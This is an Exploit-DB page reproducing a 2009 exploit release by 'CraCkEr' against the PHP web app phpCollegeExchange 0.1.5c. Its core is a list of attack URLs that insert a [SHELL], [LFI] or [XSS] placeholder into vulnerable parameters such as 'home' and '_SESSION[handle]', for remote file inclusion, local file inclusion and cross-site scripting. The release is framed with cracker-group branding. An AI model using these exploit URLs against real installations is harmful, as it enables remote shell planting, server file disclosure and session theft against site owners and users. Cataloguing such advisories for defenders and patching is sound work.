phpCollegeExchange 0.1.5c - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

EDB-ID:

9008

CVE:

2009-2219 2009-2218

EDB Verified:

Author:

CraCkEr

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-06-23

Vulnerable App:

????????????????????????????????????????????????????????????????????????????????????
??                                C r a C k E r                                   ??
??             T H E   C R A C K   O F   E T E R N A L   M I G H T                ??
????????????????????????????????????????????????????????????????????????????????????

 ?????         From The Ashes and Dust Rises An Unimaginable crack....         ?????
????????????????????????????????????????????????????????????????????????????????????
??         [ Remote File Include ]     [ Local File Include ]     [ XSS ]         ??
????????????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                   : :                                       :
?   Script   : phpCollegeExchange 0.1.5c ? ?          Register Globals :           ?
?   Download : sourceforge.net           ? ?                                       ?
?   Method   : GET                       ? ?           [?] ON   [ ] OFF            ?
?   Critical : High [????????]           ? ?                                       ?
?   Impact   : system information        ? ?                                       ?
? ???????????????????????????????????????? ??????????????????????????????????????? ?
?                                 DALnet #crackers                                ??
????????????????????????????????????????????????????????????????????????????????????
:                                                                                  :
?  Release Notes:                                                                  ?
?  ?????????????                                                                   ?
?  Typically used for remotely exploitable vulnerabilities that can lead to        ?
?  system compromise.                                                              ?
?                                                                                  ?

????????????????????????????????????????????????????????????????????????????????????
??                                Exploit URL's                                   ??
????????????????????????????????????????????????????????????????????????????????????

[RFI]

http://localhost/path/i_head.php?home=[SHELL]
http://localhost/path/i_nav.php?home=[SHELL]
http://localhost/path/user_new_2.php?home=[SHELL]
http://localhost/path/books/allbooks.php?home=[SHELL]
http://localhost/path/books/home.php?home=[SHELL]
http://localhost/path/books/mybooks.php?home=[SHELL]


[LFI]

http://localhost/path/house/myrents.php?home=[LFI]


[XSS]

http://localhost/php pages/home.php?_SESSION[handle]=[XSS]
http://localhost/path/i_head.php?home=[XSS]
http://localhost/path/i_nav.php?home=[XSS]
http://localhost/path/books/allbooks.php?home=[XSS]
http://localhost/path/books/allbooks.php?_SESSION[handle]=[XSS]
http://localhost/path/books/home.php?home=[XSS]
http://localhost/path/books/home.php?_SESSION[handle]=[XSS]
http://localhost/path/books/i_nav.php?home=[XSS]


   
????????????????????????????????????????????????????????????????????????????????????
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL, rd0 .

????????????????????????????????????????????????????????????????????????????????????
??                                 © CraCkEr 2009                                 ??
????????????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2009-06-23]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services